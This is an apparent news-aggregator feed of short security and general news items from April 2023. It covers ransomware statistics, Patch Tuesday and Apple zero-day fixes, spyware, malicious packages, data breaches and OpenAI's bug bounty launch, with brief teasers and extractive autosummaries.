                Autosummary: [Figures: Known ransomware attacks by gang, March 2023; Known ransomware attacks by country, March 2023; Known ransomware attacks by industry sector, March 2023.] Fortra, the company behind GoAnywhere MFT, released an emergency patch (7.1.2) for the vulnerability in early February—but by then, Cl0p had already used it to break into a myriad of networks and deploy ransomware. Between them, the Anglosphere countries of the USA, Canada, UK, and Australia accounted for 69% of known Cl0p attacks, with Canada and Australia suffering more attacks than countries with bigger populations and economies, like Germany and France. Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. This attack, which is said to have begun on or around March 6, created severe ramifications for the organization, disrupting freight carrier pickups, online orders, and access to customer support. March has also seen some intriguing activity from other ransomware gangs like DarkPower, which appeared to be turning on and off throughout the month, as well as BianLian, which has shifted its focus from encrypting files altogether to pure data-leak extortion.


                Ransomware in France, April 2022–March 2023

                exploits
                2023-04-13 https://www.malwarebytes.com/blog/threat-intelligence/2023/04/ransomware-review-france

                Categories: Ransomware

                Categories: Threat Intelligence

                In the last 12 months France was one of the most attacked countries in the world, and a favourite target of LockBit, the world's most dangerous ransomware.


                The post Ransomware in France, April 2022–March 2023 appeared first on Malwarebytes Labs.

                "

                Autosummary: [Figure: Known attacks in the ten most attacked countries, April 2022 - March 2023.] Given the disparity between the USA and the rest of the world in terms of number of attacks it would be easy to conclude that ransomware is, first and foremost, a USA problem. [Figure: The ten most attacked countries between April 2022 - March 2023, ordered by attacks per capita.] By any measure, France is one of the most attacked countries in the world, and its organisations are prime targets for ransomware gangs. By comparison, over the same twelve-month period, 4% of known attacks in the USA and 3% of known attacks in Germany affected their government sectors, while just 20 miles across the English Channel, the UK experienced none at all. [Figure: Monthly ransomware attacks in France with LockBit highlighted, April 2022 - March 2023.] The reasons for this aren't clear, but it may simply be that as the 800lb gorilla in the ransomware ecosystem, LockBit is best placed to exploit opportunities outside of the Anglosphere. Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. In all, LockBit was used in 57% of known attacks in France, while the next most used ransomware, Vice Society, accounted for just 6%.


                Sextortion "assistance" scammers con victims further

                financial
                2023-04-13 https://www.malwarebytes.com/blog/news/2023/04/sextortion-assistance-scammers-con-victims-further

                Categories: News

                Tags: FBI

                Tags: extortion

                Tags: sextortion

                Tags: crime

                Tags: criminal

                Tags: nude

                Tags: nudes

                Tags: photographs

                Tags: images

                Tags: video

                Tags: photo

                Tags: scam

                Tags: payment

                Tags: profit

                Tags: assistance

                Tags: help

                We take a look at an FBI warning regarding for-profit entities making money from people targeted by sextortion attacks.


                The post Sextortion "assistance" scammers con victims further appeared first on Malwarebytes Labs.

                "

                Autosummary: Signs to watch out for: a company representative contacts you and offers assistance services for which the company charges fees; the company advertises sextortion assistance in exchange for fees; you are asked to pay the fees before the assistance services are rendered; the company requires you to sign a contract for their services; the company representative discourages you from contacting law enforcement or tells you contacting law enforcement is not the best way to get help; the company uses high-pressure or scare tactics in an effort to secure your business; or the for-profit company claims to be connected to government or law enforcement officials. Here are some examples provided by the FBI with regard to what bogus assistance looks like in practice, and how the "assistance" can make things worse: a company solicited multiple payments totaling $5,000 from a juvenile sextortion victim after coercing the victim with threats of reputational harm, falsely indicating the victim would be unable to go to college or get a job and the victim's parents would lose their jobs. The whack-a-mole technique, and how "help" can make things worse: this is somewhat similar to those mugshot sites, which scrape mugshots and place them online along with the details of the person in the photograph. Malwarebytes tips for dealing with sextortion: we have many tips for all aspects of romance and sextortion attempts, and here are some of the main things you can do to help yourself avoid sextortion fraud: Don't panic.


                Google Pay accidentally handed out free money, bug now fixed

                financial exploits
                2023-04-13 https://www.malwarebytes.com/blog/news/2023/04/google-pay-bug-fixed-app-stops-handing-out-free-money-to-us-users

                Categories: News

                Tags: Google Pay

                Tags: Google Pay bug

                Tags: free money

                All good things must end, they say, including generous offers of rewards caused by a short-lived glitch in Google Pay.


                The post Google Pay accidentally handed out free money, bug now fixed appeared first on Malwarebytes Labs.

                "

                Autosummary: And, yes, if wrongfully rewarded users already transferred or spent the money they received, it's theirs to keep, the team said.


                SentinelOne announces integration of firewalls and NDR capabilities with key industry players

                industry
                2023-04-13 https://www.helpnetsecurity.com/2023/04/14/sentinelone-ndr-capabilities/

                SentinelOne has unveiled integrations with key industry players Aruba, Checkpoint, Cisco, Darktrace, Extrahop, Fortinet, Palo Alto Networks and an enhanced collaboration with Vectra AI which expand the company’s firewall and NDR capabilities, and will allow organizations of all sizes to gain the insights they need to rapidly identify and respond to attacks across all vectors. “The integration of firewalls and NDR capabilities perfectly complements our XDR solutions,” said Akhil Kapoor, VP, Technology Partnerships, SentinelOne. “In … More

                The post SentinelOne announces integration of firewalls and NDR capabilities with key industry players appeared first on Help Net Security.

                "



                DirectDefense and Claroty join forces to secure XIoT environments

                industry
                2023-04-13 https://www.helpnetsecurity.com/2023/04/14/directdefense-claroty/

                DirectDefense has partnered with Claroty which empowers organizations with visibility, protection, and threat detection to secure their Extended Internet of Things (XIoT), a vast network of cyber-physical systems across industrial, healthcare, and commercial environments. As digital transformation efforts have intensified over the last decade, a broad range of XIoT assets – including operational technology (OT), the Internet of Medical Things (IoMT), building management systems (BMS) and enterprise IoT – are now interconnected. While this drives … More

                The post DirectDefense and Claroty join forces to secure XIoT environments appeared first on Help Net Security.

                "



                Twitter staff cuts leave Russian trolls unchecked

                rusia-ucrania
                2023-04-13 https://www.bbc.co.uk/news/technology-65067707?at_medium=RSS&at_campaign=KARANGA
                Troll farms are thriving after Elon Musk wiped out the team fighting them.



                Data-backed insights for future-proof cybersecurity strategies

                ciber
                2023-04-12 https://www.helpnetsecurity.com/2023/04/12/2023-qualys-trurisk-threat-research-report/

                The Qualys Threat Research Unit (TRU) has been hard at work detecting vulnerabilities worldwide, and its latest report is set to shake up the industry. In this Help Net Security interview, Travis Smith, VP of the Qualys TRU, talks about the 2023 Qualys TruRisk Threat Research Report, which provides security teams with data-backed insights to help them better understand how adversaries exploit vulnerabilities and render attacks. What are the most dangerous cyber threats to look … More

                The post Data-backed insights for future-proof cybersecurity strategies appeared first on Help Net Security.

                "

                Autosummary: All organizations must tighten processes across the various platforms – dev, testing, staging, and production. While the 2023 TruRisk Research report conducted an in-depth review of the top 163 vulnerabilities, there were an additional 500 vulnerabilities released prior to 2022 that were weaponized or exploited for the first time in 2022. Over the last few years, threat actors have shifted tactics to mature into extortion-ware, whereby they exfiltrate and encrypt data.


                11:11 Systems Managed SteelDome provides protection from ransomware attacks

                exploits ransomware
                2023-04-12 https://www.helpnetsecurity.com/2023/04/12/1111-systems-managed-steeldome/

                11:11 Systems has revealed general availability of 11:11 Managed SteelDome in partnership with SteelDome Cyber. The fully managed service is designed for organizations in need of secure, scalable and cost-efficient storage of their unstructured, on-premises data. Leveraging SteelDome’s InfiniVault application technology, 11:11 Managed SteelDome provides on-premises data storage, protection and recovery. This new offering provides data immutability and protection from ransomware attacks and optimizes data storage, all while meeting strict compliance and regulatory requirements. Acting … More

                The post 11:11 Systems Managed SteelDome provides protection from ransomware attacks appeared first on Help Net Security.

                "



                Urgent: Microsoft Issues Patches for 97 Flaws, Including Active Ransomware Exploit

                exploits ransomware
                2023-04-12 https://thehackernews.com/2023/04/urgent-microsoft-issues-patches-for-97.html
                It's the second Tuesday of the month, and Microsoft has released another set of security updates to fix a total of 97 flaws impacting its software, one of which has been actively exploited in ransomware attacks in the wild. Seven of the 97 bugs are rated Critical and 90 are rated Important in severity. Interestingly, 45 of the shortcomings are remote code execution flaws, followed by 20 "

                Autosummary: Microsoft has also updated its advisory for CVE-2013-3900, a WinVerifyTrust signature validation vulnerability, to include the following Server Core installation versions: Windows Server 2008 for 32-bit Systems Service Pack 2, Windows Server 2008 for x64-based Systems Service Pack 2, Windows Server 2008 R2 for x64-based Systems Service Pack 1, Windows Server 2012, Windows Server 2012 R2, Windows Server 2016, Windows Server 2019, and Windows Server 2022. The development comes as North Korea-linked threat actors have been observed leveraging the flaw to incorporate encrypted shellcode into legitimate libraries without invalidating the Microsoft-issued signature.


                OpenAI launched a bug bounty program

                exploits
                2023-04-12 https://securityaffairs.com/144707/security/openai-launched-bug-bounty-program.html

                AI company OpenAI launched a bug bounty program and announced payouts of up to $20,000 for security flaws in its ChatGPT chatbot service. OpenAI launched a bug bounty program and it is offering up to $20,000 to bug hunters that will report vulnerabilities in its ChatGPT chatbot service. The company explained that ChatGPT is in […]

                The post OpenAI launched a bug bounty program appeared first on Security Affairs.

                "



                Cybercrime group exploits Windows zero-day in ransomware attacks

                exploits ransomware
                2023-04-12 https://securityaffairs.com/144692/hacking/windows-zero-day-ransomware-attacks.html

                Microsoft has addressed a zero-day in the Windows Common Log File System (CLFS) actively exploited in ransomware attacks. Microsoft has addressed a zero-day vulnerability, tracked as CVE-2023-28252, in the Windows Common Log File System (CLFS), which is actively exploited in ransomware attacks. Microsoft fixed the issue with the release of Patch Tuesday security updates for […]

                The post Cybercrime group exploits Windows zero-day in ransomware attacks appeared first on Security Affairs.

                "



                HashiCorp Vault vulnerability could lead to RCE, patch today! (CVE-2023-0620)

                exploits
                2023-04-12 https://www.helpnetsecurity.com/2023/04/12/hashicorp-vault-cve-2023-0620/

                Oxeye discovered a new vulnerability (CVE-2023-0620) in the HashiCorp Vault Project, an identity-based secrets and encryption management system that controls access to API encryption keys, passwords, and certificates. The vulnerability was an SQL injection vulnerability that potentially could lead to a Remote Code Execution (RCE). Oxeye reported this vulnerability to HashiCorp, and the team quickly patched it in versions 1.13.1, 1.12.5, and 1.11.9 of Vault. HashiCorp Vault provides encryption services for modern, microservices-based … More

                The post HashiCorp Vault vulnerability could lead to RCE, patch today! (CVE-2023-0620) appeared first on Help Net Security.

                "



                Israel-based Spyware Firm QuaDream Targets High-Risk iPhones with Zero-Click Exploit

                exploits
                2023-04-12 https://thehackernews.com/2023/04/israel-based-spyware-firm-quadream.html
                Threat actors using hacking tools from an Israeli surveillanceware vendor named QuaDream targeted at least five members of civil society in North America, Central Asia, Southeast Asia, Europe, and the Middle East. According to findings from a group of researchers from the Citizen Lab, the spyware campaign was directed against journalists, political opposition figures, and an NGO worker in 2021.

                Autosummary: Internet scans carried out by the Citizen Lab reveal that QuaDream's customers operated 600 servers from several countries around the world between late 2021 and early 2023, including Bulgaria, Czech Republic, Hungary, Romania, Ghana, Israel, Mexico, Singapore, the U.A.E., and Uzbekistan.


                Hyundai data breach exposes owner details in France and Italy

                financial
                2023-04-12 https://www.bleepingcomputer.com/news/security/hyundai-data-breach-exposes-owner-details-in-france-and-italy/
                Hyundai has disclosed a data breach impacting Italian and French car owners and those who booked a test drive, warning that hackers gained access to personal data. [...]



                Kyocera Android app with 1M installs can be abused to drop malware

                exploits
                2023-04-12 https://www.bleepingcomputer.com/news/security/kyocera-android-app-with-1m-installs-can-be-abused-to-drop-malware/
                A Kyocera Android printing app is vulnerable to improper intent handling, allowing other malicious applications to abuse the flaw to download and potentially install malware on devices. [...]



                Windows admins warned to patch critical MSMQ QueueJumper bug

                exploits
                2023-04-12 https://www.bleepingcomputer.com/news/security/windows-admins-warned-to-patch-critical-msmq-queuejumper-bug/
                Security researchers and experts warn of a critical vulnerability in the Windows Message Queuing (MSMQ) middleware service patched by Microsoft during this month's Patch Tuesday and exposing hundreds of thousands of systems to attacks. [...]

                Autosummary: Redmond has also attached an "exploitation more likely" tag to CVE-2023-21554, given that it's "aware of past instances of this type of vulnerability being exploited," which makes it "an attractive target for attackers."


                QuaDream surveillance firm’s spyware targeted iPhones with zero-click exploit

                exploits
                2023-04-12 https://securityaffairs.com/144723/malware/quadream-spyware.html

                At least five members of civil society worldwide have been targeted with spyware and exploits developed by surveillance firm QuaDream. Citizen Lab researchers reported that at least five civil society members were victims of spyware and exploits developed by the Israeli surveillance firm QuaDream. The victims include journalists, political opposition figures, and an NGO worker […]

                The post QuaDream surveillance firm’s spyware targeted iPhones with zero-click exploit appeared first on Security Affairs.

                "

                Autosummary: CitizenLab identified QuaDream servers in multiple countries, including Bulgaria, Czech Republic, Hungary, Ghana, Israel, Mexico, Romania, Singapore, United Arab Emirates (UAE), and Uzbekistan.


                Elon Musk: Twitter owner changes BBC account's "government funded" label

                government
                2023-04-12 https://www.bbc.co.uk/news/entertainment-arts-65248554?at_medium=RSS&at_campaign=KARANGA
                The Twitter boss agreed to change a description from "government funded media" to "publicly funded".



                Update now! April’s Patch Tuesday includes a fix for one zero-day

                exploits
                2023-04-12 https://www.malwarebytes.com/blog/news/2023/04/update-now-aprils-patch-tuesday-includes-a-fix-for-one-zero-day

                Categories: Exploits and vulnerabilities, News

                Tags: Microsoft, Apple, Google, Adobe, Cisco, SAP, Mozilla, CVE-2023-28252, CVE-2023-28231, CVE-2023-21554, Word, Publisher, Office

                One fixed vulnerability is being actively exploited by a ransomware gang and many others were fixed in this month's Patch Tuesday updates.


                The post Update now! April’s Patch Tuesday includes a fix for one zero-day appeared first on Malwarebytes Labs.

                Autosummary: Adobe has released security updates for several products. Apple released emergency updates for two known-to-be-exploited vulnerabilities. CISA has already added the CVE-2023-28252 Windows zero-day to its catalog of Known Exploited Vulnerabilities, which means federal (FCEB) agencies have until May 2, 2023 to patch against it.


                Ransomware in the UK: April 2022–March 2023

                exploits
                2023-04-12 https://www.malwarebytes.com/blog/threat-intelligence/2023/04/ransomware-review-uk

                Categories: Ransomware, Threat Intelligence

                In the last 12 months, the UK has been second only to the USA in terms of ransomware attacks, and its education sector has been subjected to a feeding frenzy by Vice Society.


                The post Ransomware in the UK: April 2022–March 2023 appeared first on Malwarebytes Labs.

                Autosummary: Known attacks by the ten most used ransomware in the UK, April 2022 - March 2023. In fact, the UK is one of Vice Society's favourite targets, accounting for 21% of the group's known attacks in the last 12 months, a close second to the USA which accounted for 23%, and vastly more than the next country, Spain, which accounted for 8%. In January 2023, Britain's multinational postal service, Royal Mail, was attacked by LockBit, arguably the world's most dangerous ransomware, which demanded the biggest ransom we have ever seen anywhere, in any country: $80 million. In 2023, the BBC reported on 14 schools in the UK that were attacked by Vice Society including Carmel College, St Helens, Durham Johnston Comprehensive School (hacked in 2021, documents posted online in January 2022), and Frances King School of English, London/Dublin. Our analysis of total known attacks, known attacks per $1T of GDP, and known attacks per capita, shows that ransomware gangs treated the entire Anglosphere, not just the USA, as their prime hunting ground. On that basis, the USA and the UK suffered nearly identical rates of attack, at around 50 known attacks per $1T. Measured this way, the UK is third, almost a mirror of its Atlantic cousin and quite different from its geographic and economic near neighbours, France and Germany. Known ransomware attacks by month on the UK education sector, by gang, April 2022 - March 2023. It is worth remembering that our numbers only reflect attacks where a ransom wasn't paid, and the true number of attacks is far larger.


                KFC, Pizza Hut owner employee data stolen in ransomware attack

                exploits ransomware
                2023-04-12 https://www.malwarebytes.com/blog/news/2023/04/kfc-pizza-hut-owner-employee-data-stolen-in-ransomware-attack

                Categories: News, Ransomware

                Tags: The Habit Burger Grill, KFC, Pizza Hut, Yum! Brands, ransomware

                Yum! Brands, owner of KFC, Pizza Hut, and other fast food chains, was breached in January. It recently found employee data has been compromised.


                The post KFC, Pizza Hut owner employee data stolen in ransomware attack appeared first on Malwarebytes Labs.

                Autosummary: Yum! Brands, the fast-food chain operator behind The Habit Burger Grill, KFC, Pizza Hut, and Taco Bell, has begun sending Notice of Security Breach letters to employees whose data were potentially affected. "While the Company's response to this incident is ongoing, at this time we do not believe such impact of the incident will ultimately have a material adverse effect on our business, results of operations or financial condition," the company says in its 2022 annual report to the SEC which it filed on Friday. Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.


                What are the cybersecurity concerns of SMBs by sector?

                ciber
                2023-04-12 https://www.welivesecurity.com/2023/04/12/what-are-cybersecurity-concerns-smbs-sector/

                Some sectors have high confidence in their in-house cybersecurity expertise, while others prefer to enlist the support of an external provider to keep their systems and data secured

                The post What are the cybersecurity concerns of SMBs by sector? appeared first on WeLiveSecurity

                Autosummary: With a majority of SMBs in technology and telecoms (69%), manufacturing and industrial (67%), and financial services (74%) preferring to outsource their security needs, a question that remains elusive from this survey is: Which specific business types in these verticals are prioritizing continuing in-house management, and what are their specific reasons? Retail, wholesale, and distribution: Four in five (80%) retail, wholesale, and distribution SMBs have moderate or high confidence in their in-house cybersecurity expertise, the most of any sector. A total of 32% of SMBs surveyed reported use of endpoint detection and response (EDR), extended detection and response (XDR), or managed detection and response (MDR) and 33% plan to leverage the technology in the next 12 months.


                Hyundai suffered a data breach that impacted customers in France and Italy

                financial
                2023-04-12 https://securityaffairs.com/144732/data-breach/hyundai-suffered-data-breach.html

                Hyundai disclosed a data breach that impacted Italian and French car owners and clients who booked a test drive. Hyundai has suffered a data breach that impacted Italian and French car owners and customers who booked a test drive. Threat actors had access to the email addresses, physical addresses, telephone numbers, and vehicle chassis numbers […]

                The post Hyundai suffered a data breach that impacted customers in France and Italy appeared first on Security Affairs.



                NPR quits Twitter over "government-funded" label

                government
                2023-04-12 https://www.bbc.co.uk/news/world-us-canada-65202978?at_medium=RSS&at_campaign=KARANGA
                The not-for-profit news outlet says the description is misleading and undermines its credibility.


                How to transform cybersecurity learning and make content more engaging

                ciber
                2023-04-11 https://www.helpnetsecurity.com/2023/04/11/transform-cybersecurity-learning-video/

                While applications like Slack and Teams have transformed how we collaborate and communicate, cybersecurity training has not kept pace with these advancements. Most security training is still being delivered through web-based learning management systems, according to CybSafe. Often, important security information gets lost in the noise. Only half of the workers interviewed paid attention to emailed content. Furthermore, 20% of employees said they could not remember or find relevant cybersecurity information. In this Help Net … More

                The post How to transform cybersecurity learning and make content more engaging appeared first on Help Net Security.



                Apple rushes fixes for exploited zero-days in iPhones and Macs (CVE-2023-28205, CVE-2023-28206)

                exploits
                2023-04-11 https://www.helpnetsecurity.com/2023/04/11/cve-2023-28205-cve-2023-28206/

                Apple has pushed out security updates that fix two actively exploited zero-day vulnerabilities (CVE-2023-28205, CVE-2023-28206) in macOS, iOS and iPadOS. Reported by researchers Clément Lecigne of Google’s Threat Analysis Group (TAG) and Donncha Ó Cearbhaill, the head of Amnesty International’s Security Lab, the vulnerabilities have been exploited in tandem to achieve full device compromise – with the likely (though not confirmed) goal to install spyware on target devices. About the vulnerabilities: CVE-2023-28205 is a use … More

                The post Apple rushes fixes for exploited zero-days in iPhones and Macs (CVE-2023-28205, CVE-2023-28206) appeared first on Help Net Security.

                Autosummary: Security updates for Macs, iPhones and iPads are available. Since Friday (April 7), Apple has released security updates for newer macOS (13.3.1), iOS and iPadOS (16.4.1) versions, and then quickly backported the patches to fix the flaws in older (macOS 12.6.5 and 11.7.6, and iOS/iPadOS 15.7.5) versions.


                Cybercriminals Turn to Android Loaders on Dark Web to Evade Google Play Security

                ciber
                2023-04-11 https://thehackernews.com/2023/04/cybercriminals-turn-to-android-loaders.html
                Malicious loader programs capable of trojanizing Android applications are being traded on the criminal underground for up to $20,000 as a way to evade Google Play Store defenses. "The most popular application categories to hide malware and unwanted software include cryptocurrency trackers, financial apps, QR-code scanners, and even dating apps," Kaspersky said in a new report based on messages

                Autosummary: "The most popular application categories to hide malware and unwanted software include cryptocurrency trackers, financial apps, QR-code scanners, and even dating apps," Kaspersky said in a new report based on messages posted on online forums between 2019 and 2023.


                Cryptocurrency Stealer Malware Distributed via 13 NuGet Packages

                exploits
                2023-04-11 https://thehackernews.com/2023/04/cryptocurrency-stealer-malware.html
                Cybersecurity researchers have detailed the inner workings of the cryptocurrency stealer malware that was distributed via 13 malicious NuGet packages as part of a supply chain attack targeting .NET developers. The sophisticated typosquatting campaign, which was detailed by JFrog late last month, impersonated legitimate packages to execute PowerShell code designed to retrieve a follow-on binary

                Autosummary: "The bad actors used typosquatting techniques to deploy a custom malicious payload [...] which targets the Exodus crypto wallet and leaks the victim's credentials to cryptocurrency exchanges, by using code injection," Shachar Menashe, senior director at JFrog Security Research, said.


                Apple released emergency updates to fix recently disclosed zero-day bugs on older devices

                exploits
                2023-04-11 https://securityaffairs.com/144667/hacking/apple-released-emergency.html

                Apple released updates to backport patches addressing two actively exploited zero-day vulnerabilities in older iPhones, iPads, and Macs. Apple has released emergency updates to backport security patches that address two actively exploited zero-day flaws also affecting older iPhones, iPads, and Macs. On April 7, 2023, Apple has released emergency security updates to address two actively exploited zero-day […]

                The post Apple released emergency updates to fix recently disclosed zero-day bugs on older devices appeared first on Security Affairs.

                Autosummary: Monterey 12.6.5, and macOS Big Sur 11.7.6: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), iPod touch (7th generation), and Macs running macOS


                Cuba lifts ban on cash deposits in US dollars at banks

                financial
                2023-04-11 https://www.bbc.co.uk/news/world-latin-america-65230672?at_medium=RSS&at_campaign=KARANGA
                Cuba's government announced the surprise move just under two years after the ban came into force.


                Kodi discloses data breach after forum database for sale online

                financial
                2023-04-11 https://www.bleepingcomputer.com/news/security/kodi-discloses-data-breach-after-forum-database-for-sale-online/
                The Kodi Foundation has disclosed a data breach after hackers stole the organization's MyBB forum database containing user data and private messages and attempted to sell it online. [...]

                Autosummary: The stolen database contains all public forum posts, staff forum posts, private messages sent between users, and forum member data, including usernames, email addresses, and encrypted (hashed and salted) passwords generated by the MyBB (v1.8.27) software.


                Cybercriminals charge $5K to add Android malware to Google Play

                exploits ciber
                2023-04-11 https://www.bleepingcomputer.com/news/security/cybercriminals-charge-5k-to-add-android-malware-to-google-play/
                Malware developers have created a thriving market promising to add malicious Android apps to Google Play for $2,000 to $20,000, depending on the type of malicious behavior cyber criminals request. [...]

                Autosummary: Selling the source code of a loader for $20,000 (Kaspersky). To promote these loaders, the sellers publish videos showcasing their features, user-friendly interface, granular targeting filters, and more.


                Yum! Brands, the owner of KFC, Taco Bell and Pizza Hut, discloses data breach

                financial
                2023-04-11 https://securityaffairs.com/144676/data-breach/yum-brands-data-breach.html

                Yum! Brands, the company that owns the KFC, Pizza Hut, and Taco Bell brands, disclosed a data breach after the January ransomware attack. On January 13, 2023, Yum! Brands suffered a cyberattack that forced the company to take its systems offline closing roughly 300 restaurants in the UK for one day. Now the company, which owns the […]

                The post Yum! Brands, the owner of KFC, Taco Bell and Pizza Hut, discloses data breach appeared first on Security Affairs.



                OpenAI launches bug bounty program with rewards up to $20K

                exploits
                2023-04-11 https://www.bleepingcomputer.com/news/security/openai-launches-bug-bounty-program-with-rewards-up-to-20k/
                AI research company OpenAI announced today the launch of a new bug bounty program to allow registered security researchers to discover vulnerabilities in its product line and get paid for reporting them via the Bugcrowd crowdsourced security platform. [...]

                Autosummary: However, while the OpenAI Application Programming Interface (API) and its ChatGPT artificial-intelligence chatbot are in-scope targets for bounty hunters, the company asked researchers to report model issues via a separate form unless they have a security impact.


                Hacked sites caught spreading malware via fake Chrome updates

                exploits
                2023-04-11 https://www.bleepingcomputer.com/news/security/hacked-sites-caught-spreading-malware-via-fake-chrome-updates/
                Hackers are compromising websites to inject scripts that display fake Google Chrome automatic update errors that distribute malware to unaware visitors. [...]

                Autosummary: The campaign has been underway since November 2022, and according to NTT's security analyst Rintaro Koike, it shifted up a gear after February 2023, expanding its targeting scope to cover users who speak Japanese, Korean, and Spanish.


                Windows zero-day vulnerability exploited in ransomware attacks

                exploits ransomware
                2023-04-11 https://www.bleepingcomputer.com/news/security/windows-zero-day-vulnerability-exploited-in-ransomware-attacks/
                Microsoft has patched a zero-day vulnerability in the Windows Common Log File System (CLFS), actively exploited by cybercriminals to escalate privileges and deploy Nokoyawa ransomware payloads. [...]

                Autosummary: Redmond has patched at least 32 local privilege escalation vulnerabilities in the Windows CLFS driver since 2018, with three of them (CVE-2022-24521, CVE-2022-37969, and CVE-2023-23376) also exploited in the wild as zero-days, according to Kaspersky.


                Microsoft April 2023 Patch Tuesday fixes 1 zero-day, 97 flaws

                exploits
                2023-04-11 https://www.bleepingcomputer.com/news/microsoft/microsoft-april-2023-patch-tuesday-fixes-1-zero-day-97-flaws/
                Today is Microsoft's April 2023 Patch Tuesday, and security updates fix one actively exploited zero-day vulnerability and a total of 97 flaws. [...]

                Autosummary: The number of bugs in each vulnerability category is listed below: 20 Elevation of Privilege Vulnerabilities; 8 Security Feature Bypass Vulnerabilities; 45 Remote Code Execution Vulnerabilities; 10 Information Disclosure Vulnerabilities; 9 Denial of Service Vulnerabilities; 6 Spoofing Vulnerabilities. This count does not include seventeen Microsoft Edge vulnerabilities fixed on April 6th.


                Microsoft patches zero-day exploited by attackers (CVE-2023-28252)

                exploits
                2023-04-11 https://www.helpnetsecurity.com/2023/04/11/cve-2023-28252/

                It’s April 2023 Patch Tuesday, and Microsoft has released fixes for 97 CVE-numbered vulnerabilities, including one actively exploited zero-day (CVE-2023-28252). About CVE-2023-28252 CVE-2023-28252 is a vulnerability in the Windows Common Log File System (CLFS) that allows attackers to gain SYSTEM privileges on target machines. “Over the last two years, attackers appear to have found success targeting CLFS in order to elevate privileges as part of post-compromise activity,” Satnam Narang, senior staff research engineer at Tenable, … More

                The post Microsoft patches zero-day exploited by attackers (CVE-2023-28252) appeared first on Help Net Security.

                Autosummary: “Over the last two years, attackers appear to have found success targeting CLFS in order to elevate privileges as part of post-compromise activity,” Satnam Narang, senior staff research engineer at Tenable, told Help Net Security. It’s April 2023 Patch Tuesday, and Microsoft has released fixes for 97 CVE-numbered vulnerabilities, including one actively exploited zero-day (CVE-2023-28252).


                Spain police expose Brazilian football stardom scam

                financial latam
                2023-04-11 https://www.bbc.co.uk/news/world-europe-65245064?at_medium=RSS&at_campaign=KARANGA
                Gangs are accused of scamming families by promising they would turn their sons into elite players.


                Apple releases emergency updates for two known-to-be-exploited vulnerabilities

                exploits
                2023-04-11 https://www.malwarebytes.com/blog/news/2023/04/apple-releases-emergency-updates-for-two-known-to-be-exploited-vulnerabilities

                Categories: Apple, Exploits and vulnerabilities, News

                Tags: iOS 16.4.1, iPadOS 16.4.1, macOS 13.3.1, CVE-2023-28206, CVE-2023-28205, use-after-free, out-of-bounds write, IOSurfaceAccelerator

                Apple has released iOS 16.4.1, iPadOS 16.4.1, and macOS 13.3.1 for the iPhone, iPad, and Mac, respectively, and our advice is to install them as soon as possible.


                The post Apple releases emergency updates for two known-to-be-exploited vulnerabilities appeared first on Malwarebytes Labs.

                Autosummary: On Friday April 7, 2023, Apple released iOS 16.4.1, iPadOS 16.4.1, and macOS 13.3.1 for the iPhone, iPad, and Mac, respectively, and our advice is to install them as soon as possible because all three updates include important security fixes.


                Cybercriminals use simple trick to obtain personal data

                ciber
                2023-04-10 https://www.helpnetsecurity.com/2023/04/10/simple-trick-disclose-personal-data/

                People reveal more personal information when you ask them the same questions a second time – according to new research from the University of East Anglia. A new study reveals how simple repetition can make people over-disclose, and potentially put themselves at risk of identity theft and cybercrime. The research team say that understanding why people disclose personal data could help inform measures to address the problem. People over-disclose personal data From subscribing to online … More

                The post Cybercriminals use simple trick to obtain personal data appeared first on Help Net Security.

                Autosummary: The price of privacy: The research team asked 27 study participants for a range of personal information online including their height, weight and phone number as well as their opinions on topics including immigration, abortion, and politics.


                CISA Warns of 5 Actively Exploited Security Flaws: Urgent Action Required

                exploits
                2023-04-10 https://thehackernews.com/2023/04/cisa-warns-of-5-actively-exploited.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added five security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. This includes three high-severity flaws in the Veritas Backup Exec Agent software (CVE-2021-27876, CVE-2021-27877, and CVE-2021-27878) that could lead to the execution of privileged commands


                Elon Musk: Tesla to build new battery factory in Shanghai

                industry
                2023-04-10 https://www.bbc.co.uk/news/business-65228927?at_medium=RSS&at_campaign=KARANGA
                Elon Musk's company says the plant will be able to produce 10,000 "Megapack" battery units a year.


                Top 10 Cybersecurity Trends for 2023: From Zero Trust to Cyber Insurance

                ciber
                2023-04-10 https://thehackernews.com/2023/04/top-10-cybersecurity-trends-for-2023.html
                As technology advances, cyberattacks are becoming more sophisticated. With the increasing use of technology in our daily lives, cybercrime is on the rise, as evidenced by the fact that cyberattacks caused 92% of all data breaches in the first quarter of 2022. Staying current with cybersecurity trends and laws is crucial to combat these threats, which can significantly impact business development

                Autosummary: Gcore is an international leader in public cloud and edge computing, content delivery, hosting, and security solutions, with protection servers based on high-performance Intel® Xeon® Scalable processors. A successful data breach can cost millions of dollars, and the amount depends directly on the type of attack and its duration, as well as the loss of reputation, customer loyalty, and the customers themselves. 2 — Cloud security: According to more data by Statista, cloud security is the fastest-growing segment in the IT security market, with a projected growth of nearly 27% from 2022 to 2023.


                Over 1 Million WordPress Sites Infected by Balada Injector Malware Campaign

                exploits
                2023-04-10 https://thehackernews.com/2023/04/over-1-million-wordpress-sites-infected.html
                Over one million WordPress websites are estimated to have been infected by an ongoing campaign to deploy malware called Balada Injector since 2017. The massive campaign, per GoDaddy's Sucuri, "leverages all known and recently discovered theme and plugin vulnerabilities" to breach WordPress sites. The attacks are known to play out in waves once every few weeks. "This campaign is easily identified "

                Autosummary: The websites include fake tech support, fraudulent lottery wins, and rogue CAPTCHA pages urging users to turn on notifications to "Please Allow to verify, that you are not a robot," thereby enabling the actors to send spam ads.


                Mexico hot air balloon: Pilot charged over deadly crash

                latam
                2023-04-10 https://www.bbc.co.uk/news/world-latin-america-65230671?at_medium=RSS&at_campaign=KARANGA
                Two people died when the balloon burst into flames near the Teotihuacán archaeological site on 1 April.


                SD Worx shuts down UK payroll, HR services after cyberattack

                ciber
                2023-04-10 https://www.bleepingcomputer.com/news/security/sd-worx-shuts-down-uk-payroll-hr-services-after-cyberattack/
                Belgian HR and payroll giant SD Worx has suffered a cyberattack causing them to shut down all IT systems for its UK and Ireland services. [...]

